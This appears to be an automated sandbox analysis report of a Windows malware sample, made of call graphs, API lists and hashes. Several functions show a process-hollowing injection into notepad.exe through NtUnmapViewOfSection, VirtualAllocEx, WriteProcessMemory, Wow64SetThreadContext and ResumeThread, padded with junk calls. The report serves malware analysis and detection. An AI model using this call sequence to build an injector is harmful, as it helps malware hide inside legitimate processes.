7086->7088 7089 60783a 7087->7089 7111 605ef8 7088->7111 7090 6072e4 42 API calls 7089->7090 7098 6077ed 7090->7098 7093 604b70 42 API calls 7094 6077db 7093->7094 7096 6072e4 42 API calls 7094->7096 7095 6039ec 11 API calls 7097 607866 7095->7097 7096->7098 7099 603a10 11 API calls 7097->7099 7098->7095 7100 607876 7099->7100 7101 6039ec 11 API 
calls 7100->7101 7102 60787e 7101->7102 7102->7074 7104 6072f0 7103->7104 7105 6064bc 42 API calls 7104->7105 7106 60731d 7105->7106 7107 603a40 11 API calls 7106->7107 7108 607328 7107->7108 7109 6039ec 11 API calls 7108->7109 7110 60733d 7109->7110 7110->7074 7112 605f0b 7111->7112 7113 603e44 11 API calls 7112->7113 7114 605f1d 7113->7114 7114->7093 7115 604c91 7130 602ed4 GetKeyboardType 7115->7130 7118 604cd7 7120 604cdc GetCommandLineA 7118->7120 7138 601164 GetStartupInfoA 7120->7138 7123 604d49 GetThreadLocale 7126 604bc8 12 API calls 7123->7126 7124 604d1c GetVersion 7125 604d38 GetThreadLocale 7124->7125 7129 604d2c GetCurrentThreadId 7124->7129 7140 604bc8 GetLocaleInfoA 7125->7140 7126->7129 7131 602ee3 GetKeyboardType 7130->7131 7132 602ef6 7130->7132 7131->7132 7132->7118 7133 602f04 RegOpenKeyExA 7132->7133 7134 602f7c 7133->7134 7135 602f2f RegQueryValueExA 7133->7135 7134->7118 7136 602f66 RegCloseKey 7135->7136 7136->7118 7139 60117a GetVersion 7138->7139 7139->7123 7139->7124 7141 604c03 7140->7141 7142 6039ec 11 API calls 7141->7142 7143 604c2d 7142->7143 7143->7129 7144 609492 CloseHandle CloseHandle 7145 6094af 7144->7145 7146 6034a0 4 API calls 7144->7146 7147 603a10 11 API calls 7145->7147 7146->7145 7148 6094cc 7147->7148 7149 6044b4 13 API calls 7148->7149 7150 6094da 7149->7150 6521 606e13 6522 6039ec 11 API calls 6521->6522 6523 606e3f GetThreadLocale 6522->6523 6540 606adc GetLocaleInfoA 6523->6540 6525 606e57 6526 606e70 6525->6526 6538 606ecf 6525->6538 6527 606ec1 6526->6527 6534 606e8c 6526->6534 6529 603a40 11 API calls 6527->6529 6528 606ebc 6531 603a10 11 API calls 6528->6531 6529->6528 6532 606fdd 6531->6532 6534->6528 6546 603bb8 6534->6546 6549 603c68 6534->6549 6537 603c68 11 API calls 6537->6538 6538->6528 6538->6537 6539 603bb8 11 API calls 6538->6539 6563 607bb4 6538->6563 6567 603e44 6538->6567 6539->6538 6541 606b03 6540->6541 6542 606b15 6540->6542 6543 603adc 11 API calls 6541->6543 6544 603a40 11 API calls 6542->6544 
6545 606b13 6543->6545 6544->6545 6545->6525 6547 603adc 11 API calls 6546->6547 6548 603bc5 6547->6548 6548->6534 6550 603cab 6549->6550 6551 603c6c 6549->6551 6550->6534 6552 603c76 6551->6552 6558 603a40 6551->6558 6553 603ca0 6552->6553 6554 603c89 6552->6554 6559 603e84 11 API calls 6553->6559 6556 603e84 11 API calls 6554->6556 6555 603a82 6555->6534 6562 603c8e 6556->6562 6557 603a54 6557->6555 6561 6028b0 11 API calls 6557->6561 6558->6557 6560 603ab0 11 API calls 6558->6560 6559->6562 6560->6557 6561->6555 6562->6534 6564 607bea 6563->6564 6565 607bc8 6563->6565 6564->6538 6565->6564 6574 607b94 6565->6574 6568 603e76 6567->6568 6569 603e49 6567->6569 6570 6039ec 11 API calls 6568->6570 6569->6568 6571 603e5d 6569->6571 6573 603e6c 6570->6573 6572 603adc 11 API calls 6571->6572 6572->6573 6573->6538 6575 607ba0 CharNextA 6574->6575 6576 607baa 6574->6576 6575->6564 6576->6564 7151 601a9d 7152 601a84 7151->7152 7153 601a97 7152->7153 7154 601a8d LeaveCriticalSection 7152->7154 7154->7153

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ShowCaret.USER32(00000000), ref: 0040118E
                                                                  • NtUnmapViewOfSection.NTDLL(774B0000,0B813440,00000164,00400000,?,00000000), ref: 004011B3
                                                                  • ShowCaret.USER32(00000000), ref: 004011B7
                                                                  • VirtualAllocEx.KERNELBASE(756E0000,0030B70C,00000164,00400000,0004E000,00003000,00000040,?,00000000), ref: 004011EC
                                                                  • ShowCaret.USER32(00000000), ref: 004011F0
                                                                  • WriteProcessMemory.KERNELBASE(756E0000,03140762,00000164,00400000,?,00000400,00000000,?,00000000), ref: 0040121B
                                                                  • ShowCaret.USER32(00000000), ref: 0040121F
                                                                  • ShowCaret.USER32(00000000), ref: 00401239
                                                                  • ShowCaret.USER32(00000000), ref: 0040125E
                                                                  • WriteProcessMemory.KERNELBASE(756E0000,03140762,00000164,0004C000,00015A00,00001E00,00000000,?,00000000), ref: 00401299
                                                                  • ShowCaret.USER32(00000000), ref: 004012CA
                                                                  • ShowCaret.USER32(00000000), ref: 004012EE
                                                                  • WriteProcessMemory.KERNELBASE(756E0000,03140762,00000164,7EFDDFF8,00407114,00000004,00000000,?,00000000), ref: 00401320
                                                                  • ShowCaret.USER32(00000000), ref: 00401324
                                                                  • ShowCaret.USER32(00000000), ref: 0040133B
                                                                  • Wow64SetThreadContext.KERNEL32(756E0000,00BA2230,00000168,00406620,?,00000000), ref: 0040135B
                                                                  • ShowCaret.USER32(00000000), ref: 0040135F
                                                                  • ResumeThread.KERNELBASE(756E0000,000BCC14,00000168,?,00000000), ref: 0040137A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CaretShow$MemoryProcessWrite$Thread$AllocContextResumeSectionUnmapViewVirtualWow64
                                                                  • String ID: Hq@$`p@
                                                                  • API String ID: 480950890-1281468770
                                                                  • Opcode ID: b6b0f8813bb7eff36c5e92e955d4611ca0407a266504072ab683b035350681cc
                                                                  • Instruction ID: 1cedc51185f688dccbac480823edada26e59cc5e99e7b06dbe20370140511c73
                                                                  • Opcode Fuzzy Hash: b6b0f8813bb7eff36c5e92e955d4611ca0407a266504072ab683b035350681cc
                                                                  • Instruction Fuzzy Hash: 2D510DF5610610AFD344EB59EE91F2637F9FB88704F028169F506E73A5C6B4B821CB68

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 004015C0: GetCurrentProcess.KERNEL32(00000000,?,0040160D,?,00000000), ref: 004015D7
                                                                  • SHGetFolderPathW.SHELL32(00000000,-0000002A,00000000,00000000,?), ref: 00401635
                                                                  • lstrcatW.KERNEL32(?,\notepad.exe,?,00000000), ref: 00401645
                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040165D
                                                                    • Part of subcall function 00401530: ShowCaret.USER32(00000000), ref: 0040154C
                                                                  • ShowCaret.USER32(00000000), ref: 0040169B
                                                                  • ShowCaret.USER32(00000000), ref: 0040169F
                                                                  • ShowCaret.USER32(00000000), ref: 004016C7
                                                                  • ShowCaret.USER32(00000000), ref: 004016E8
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004016F4
                                                                  • EnumResourceNamesA.KERNEL32(756E0000,02CAC166,00000000,00000015,00401040,00000000,?,00000000), ref: 00401721
                                                                    • Part of subcall function 00401390: ShowCaret.USER32(00000000), ref: 00401396
                                                                    • Part of subcall function 00401390: VirtualProtect.KERNELBASE(756E0000,0030C13C,00000000), ref: 00401433
                                                                  • ShowCaret.USER32(00000000), ref: 0040173B
                                                                  • CreateProcessW.KERNEL32(756E0000,002BAF82,?,00000000,?,00000000), ref: 00401782
                                                                  • ShowCaret.USER32(00000000), ref: 0040179A
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 0040118E
                                                                    • Part of subcall function 00401170: NtUnmapViewOfSection.NTDLL(774B0000,0B813440,00000164,00400000,?,00000000), ref: 004011B3
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 004011B7
                                                                    • Part of subcall function 00401170: VirtualAllocEx.KERNELBASE(756E0000,0030B70C,00000164,00400000,0004E000,00003000,00000040,?,00000000), ref: 004011EC
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 004011F0
                                                                    • Part of subcall function 00401170: WriteProcessMemory.KERNELBASE(756E0000,03140762,00000164,00400000,?,00000400,00000000,?,00000000), ref: 0040121B
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 0040121F
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 00401239
                                                                    • Part of subcall function 00401170: ShowCaret.USER32(00000000), ref: 0040125E
                                                                    • Part of subcall function 00401170: WriteProcessMemory.KERNELBASE(756E0000,03140762,00000164,0004C000,00015A00,00001E00,00000000,?,00000000), ref: 00401299
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CaretShow$Process$MemoryVirtualWrite$AllocCreateCurrentEnumExecuteFolderLibraryLoadNamesPathProtectResourceSectionShellUnmapViewlstrcat
                                                                  • String ID: OPIOOUKHJJTY$\notepad.exe$advapi32.dll$open
                                                                  • API String ID: 1655093362-2236918752
                                                                  • Opcode ID: 1b204ab233147d46d13166e20a68fa83a0cf2c5b14558259fd0cdf6a8d0390c1
                                                                  • Instruction ID: 21d5881589ab2f9bb9e7312981c207e25e63c3dc4e9fed1a4688bf212c1fbff5
                                                                  • Opcode Fuzzy Hash: 1b204ab233147d46d13166e20a68fa83a0cf2c5b14558259fd0cdf6a8d0390c1
                                                                  • Instruction Fuzzy Hash: FC418AB1690300BFE210E760DD42F6B37E9E7C4B44F118539B605FB1E1D9B8A914876D

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ShowCaret.USER32(00000000), ref: 00401396
                                                                  • VirtualProtect.KERNELBASE(756E0000,0030C13C,00000000), ref: 00401433
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CaretProtectShowVirtual
                                                                  • String ID: 910$V/
                                                                  • API String ID: 3929742858-341175346
                                                                  • Opcode ID: baf9333768f30c66eaba00d9cb631bdcffc0c17c59462f0b4dfa1dc181a1cdd6
                                                                  • Instruction ID: 7adf0c5093f46c572695bcb1cc4dacb91342d891db2e85d7d2a02cab4f7e0da6
                                                                  • Opcode Fuzzy Hash: baf9333768f30c66eaba00d9cb631bdcffc0c17c59462f0b4dfa1dc181a1cdd6
                                                                  • Instruction Fuzzy Hash: 841151B5201210AFD250EBA5DD85F2777FCEB88754F124229FA0AE32A1C674BD108779

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,004035B7,00000000,?,?,?,00401836), ref: 00403817
                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,004035B7,00000000,?,?,?,00401836), ref: 0040384B
                                                                  • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00401836), ref: 00403865
                                                                  • HeapFree.KERNEL32(00000000,?), ref: 0040387C
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap$FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 3499195154-0
                                                                  • Opcode ID: f01af24e2874631ea2779b74758652f445791352bac989eab95b762f4ea42c63
                                                                  • Instruction ID: 6faec744670907b242940572656bc554ab04cd7dd9b01d2055736a1d5a4cc04c
                                                                  • Opcode Fuzzy Hash: f01af24e2874631ea2779b74758652f445791352bac989eab95b762f4ea42c63
                                                                  • Instruction Fuzzy Hash: AF116D712006209FD7209F18ED449267BF9FB44365711893AF152EA5F0D371A9A6CF48

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(?,?,00401951,?,00000000,00000000,004018AF,00000000,00000000), ref: 0040197B
                                                                  • TerminateProcess.KERNEL32(00000000,?,00401951,?,00000000,00000000,004018AF,00000000,00000000), ref: 00401982
                                                                  • ExitProcess.KERNEL32 ref: 00401A03
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentExitTerminate
                                                                  • String ID:
                                                                  • API String ID: 1703294689-0
                                                                  • Opcode ID: 71278d1f4220bcb8620912db61f9dc75cd8a913f590e7f49d4acebac21ec4584
                                                                  • Instruction ID: 6cdff9f0591df1e3503e952f8288832a1c9edc8ebce298b207857a9186d4ea9a
                                                                  • Opcode Fuzzy Hash: 71278d1f4220bcb8620912db61f9dc75cd8a913f590e7f49d4acebac21ec4584
                                                                  • Instruction Fuzzy Hash: BA01C0B12412019EDA109B69FE99A1EBBA4EB80350B11403FF4827B1F0CB399850DE6D

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,00401824,00000001), ref: 004022DA
                                                                    • Part of subcall function 00403152: HeapAlloc.KERNEL32(00000000,00000140,004022EE), ref: 0040315F
                                                                  • HeapDestroy.KERNEL32 ref: 004022F8
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                  • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocCreateDestroy
                                                                  • String ID:
                                                                  • API String ID: 2236781399-0
                                                                  • Opcode ID: 60b094575c43ce829687a51dfa7d6f82ea7a4c2e4d015bc827a296030f121e6a
                                                                  • Instruction ID: 40c72eb45e5c1eccc1a22d81960c52d894ac1ab4987cbc5cee3b80ace42f3743
                                                                  • Opcode Fuzzy Hash: 60b094575c43ce829687a51dfa7d6f82ea7a4c2e4d015bc827a296030f121e6a
                                                                  • Instruction Fuzzy Hash: 57E01275610300AAFF101B31EF49B6B3AD5EB44782F058436B805E81E0E7B489D0A958

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                   • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Task
                                                                  • String ID:
                                                                  • API String ID: 4065096731-0
                                                                  • Opcode ID: 14f1c2be7496dc62ca041e2660ef3e8e0519321bab3e56e9faf973b6ea3495f4
                                                                  • Instruction ID: 333b99c93a70b1c55f9c9043c7c8b5c49931c667e1abf1932cd73e56e3ef5478
                                                                  • Opcode Fuzzy Hash: 14f1c2be7496dc62ca041e2660ef3e8e0519321bab3e56e9faf973b6ea3495f4
                                                                  • Instruction Fuzzy Hash: 88D0A73C1483C159DA118E108811BA27B515F93B4CF2880DEE5C42F7E3C1365C47D725

                                                                   Control-flow Graph (basic blocks keyed by the report's node IDs; edges listed last)
                                                                   • 118: 4030c5-4030d6
                                                                   • 119: 4030e5-4030ea
                                                                   • 120: 4030d8-4030da
                                                                   • 121: 403126-40312d
                                                                   • 122: 4030ec-4030f2
                                                                   • 123: 4030dc-4030de
                                                                   • 124: 4030df-4030e2
                                                                   • 127: 403148
                                                                   • 128: 40312f-403138 call 403ec6
                                                                   • 125: 403111-403124 HeapAlloc
                                                                   • 126: 4030f4-4030fc call 40268d call 4034e6
                                                                   • 137: 403101-40310f call 4026ee
                                                                   • 130: 40314a-40314d
                                                                   • 135: 40313a
                                                                   • 136: 40314e-403150
                                                                   • 140: 40313c-403145 call 403ef0
                                                                   • Edges: 118->119, 118->120, 119->121, 119->122, 120->123, 120->124, 121->127, 121->128, 122->125, 122->126, 123->124, 124->119, 125->121, 125->127, 126->137, 127->130, 128->135, 128->136, 135->119, 136->130, 137->125, 137->140, 140->127
                                                                  APIs
                                                                  • HeapAlloc.KERNEL32(00000008,?,?,?,?,0040221A,00000001,00000074,?,00401836), ref: 0040311A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.370993339.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000002.00000002.370990312.0000000000400000.00000004.00000400.00020000.00000000.sdmp
                                                                   • Associated: 00000002.00000002.370996454.0000000000407000.00000004.00000400.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocHeap
                                                                  • String ID:
                                                                  • API String ID: 4292702814-0
                                                                  • Opcode ID: be1dcb0f2ca5d9915bb146dd65e79aac8d54812c6b123a79e5cb88223f99ff47
                                                                  • Instruction ID: 63a47281f7fccb9a522bad3f45b21b828df9063caa348d8c451a67992f3c2ab6
                                                                  • Opcode Fuzzy Hash: be1dcb0f2ca5d9915bb146dd65e79aac8d54812c6b123a79e5cb88223f99ff47
                                                                  • Instruction Fuzzy Hash: 73019C33A0161027E9212E255D41B5F3A1D9B84BB7F1A0237FC507B3C2D67D8E0141DD

                                                                   Control-flow Graph (basic blocks keyed by the report's node IDs; edges listed last)
                                                                   • 144: 6047b8-6047f8 GetModuleFileNameA RegOpenKeyExA
                                                                   • 145: 60483a-60487d call 6045e0 RegQueryValueExA
                                                                   • 146: 6047fa-604816 RegOpenKeyExA
                                                                   • 153: 6048a1-6048bb RegCloseKey
                                                                   • 154: 60487f-60489b RegQueryValueExA
                                                                   • 147: 604818-604834 RegOpenKeyExA
                                                                   • 149: 6048c3-6048f4 lstrcpynA GetThreadLocale GetLocaleInfoA
                                                                   • 151: 6049f3-6049f9
                                                                   • 152: 6048fa-6048fe
                                                                   • 155: 604900-604904
                                                                   • 156: 60490a-604921 lstrlenA
                                                                   • 157: 60489d
                                                                   • 159: 604926-60492c
                                                                   • 160: 604939-604942
                                                                   • 161: 60492e-604937
                                                                   • 163: 604948-60494f
                                                                   • 162: 604923
                                                                   • 164: 604951-60497b lstrcpynA LoadLibraryExA
                                                                   • 165: 60497d-60497f
                                                                   • 166: 604981-604985
                                                                   • 167: 604987-6049bb lstrcpynA LoadLibraryExA
                                                                   • 168: 6049bd-6049f1 lstrcpynA LoadLibraryExA
                                                                   • Edges: 144->145, 144->146, 145->153, 145->154, 146->145, 146->147, 147->145, 147->149, 149->151, 149->152, 152->155, 152->156, 154->153, 154->157, 155->151, 155->156, 156->159, 159->160, 159->161, 160->151, 160->163, 161->160, 161->162, 162->159, 163->164, 163->165, 164->165, 165->151, 165->166, 166->151, 166->167, 167->151, 167->168, 168->151
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000), ref: 006047D3
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 006047F1
                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0060480F
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0060482D
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00604876
                                                                  • RegQueryValueExA.ADVAPI32 ref: 00604894
                                                                  • RegCloseKey.ADVAPI32(?), ref: 006048B6
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 006048D3
                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 006048E0
                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 006048E6
                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00604911
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00604966
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00604976
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 006049A2
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 006049B2
                                                                  • lstrcpynA.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 006049DC
                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 006049EC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                  • API String ID: 1759228003-2375825460
                                                                  • Opcode ID: 021115018b862506af814cf2b311653b5a214d6eec4a7b788135a882baf68f3d
                                                                  • Instruction ID: 439e08d33a6fac8019160a22a772f9821e7e571ee344117f973a4ccba17bbda3
                                                                  • Opcode Fuzzy Hash: 021115018b862506af814cf2b311653b5a214d6eec4a7b788135a882baf68f3d
                                                                  • Instruction Fuzzy Hash: B26186B1E8424D7EEB29DAE4CC46FEFB7BD9B09300F4040A5B744E61C1DAB4DA458B54

                                                                   Control-flow Graph (basic blocks keyed by the report's node IDs; edges listed last)
                                                                   • 277: 6045e0-604606 GetModuleHandleA
                                                                   • 278: 604608-60461a GetProcAddress
                                                                   • 279: 60464c-604652
                                                                   • 282: 60461c-604631
                                                                   • 280: 604654-60465b
                                                                   • 281: 604695-60469b
                                                                   • 283: 604661-604675 call 6045b4
                                                                   • 284: 604788-604791
                                                                   • 285: 60469e-6046b8 lstrcpynA
                                                                   • 289: 604633-604647 lstrcpynA
                                                                   • 293: 60467b-60468d call 6045b4
                                                                   • 288: 604768-60476e
                                                                   • 290: 604774-604783 lstrcpynA
                                                                   • 291: 6046bd-6046d9 call 6045b4
                                                                   • 297: 6046df-60470b lstrcpynA FindFirstFileA
                                                                   • 300: 604693
                                                                   • 299: 60470d-60472a FindClose lstrlenA
                                                                   • 301: 60472c-604765 lstrcpynA lstrlenA
                                                                   • Edges: 277->278, 277->279, 278->279, 278->282, 279->280, 279->281, 280->283, 280->284, 281->285, 282->279, 282->289, 283->284, 283->293, 285->288, 288->290, 288->291, 289->284, 290->284, 291->284, 291->297, 293->284, 293->300, 297->284, 297->299, 299->284, 299->301, 300->285, 301->288
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,0060593C,?,00000000), ref: 006045FD
                                                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,0060593C,?,00000000), ref: 0060460E
                                                                  • lstrcpynA.KERNEL32(?,?,?,?,00000000), ref: 00604642
                                                                  • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,0060593C,?,00000000), ref: 006046B3
                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 006046EE
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 00604701
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 0060470E
                                                                  • lstrlenA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 0060471A
                                                                  • lstrcpynA.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C), ref: 0060474E
                                                                  • lstrlenA.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C), ref: 0060475A
                                                                  • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00604783
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.371099227.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                   • Associated: 00000002.00000002.371096001.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371102376.000000000060A000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371105267.000000000060C000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000002.00000002.371108196.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                  • API String ID: 3245196872-1565342463
                                                                  • Opcode ID: 2e4b354c8dbaeedcc6917afc53ded3b95313a27eaa8e3af3d783511b16afa5e1
                                                                  • Instruction ID: f25b1826d3d404d435323bdc63ce11a4a697c9fd044df481343fbc9de6b959a4
                                                                  • Opcode Fuzzy Hash: 2e4b354c8dbaeedcc6917afc53ded3b95313a27eaa8e3af3d783511b16afa5e1
                                                                  • Instruction Fuzzy Hash: 77513CB1D80158AFCB25DBE8CC85AEFB7FEAF46300F050595E255E7281DB709E408BA4

                                                                   Control-flow Graph (basic blocks keyed by the report's node IDs; edges listed last)
                                                                   • 302: 6048c3-6048f4 lstrcpynA GetThreadLocale GetLocaleInfoA
                                                                   • 303: 6049f3-6049f9
                                                                   • 304: 6048fa-6048fe
                                                                   • 305: 604900-604904
                                                                   • 306: 60490a-604921 lstrlenA
                                                                   • 307: 604926-60492c
                                                                   • 308: 604939-604942
                                                                   • 309: 60492e-604937
                                                                   • 311: 604948-60494f
                                                                   • 310: 604923
                                                                   • 312: 604951-60497b lstrcpynA LoadLibraryExA
                                                                   • 313: 60497d-60497f
                                                                   • 314: 604981-604985
                                                                   • 315: 604987-6049bb lstrcpynA LoadLibraryExA
                                                                   • 316: 6049bd-6049f1 lstrcpynA LoadLibraryExA
